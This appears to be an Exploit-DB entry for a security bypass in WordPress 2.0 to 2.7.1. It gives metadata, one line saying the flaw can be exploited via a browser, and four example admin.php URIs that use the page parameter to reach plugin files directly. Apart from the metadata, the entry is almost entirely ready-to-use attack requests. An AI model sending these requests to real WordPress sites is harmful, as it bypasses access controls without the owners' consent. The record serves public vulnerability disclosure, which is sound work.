WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass
Author: Fernando Arnaboldi
type: webapps
platform: php
port:
date_added: 2009-11-09
date_updated: 2017-05-04
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comWordPress-2.7.1.zip
An attacker can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php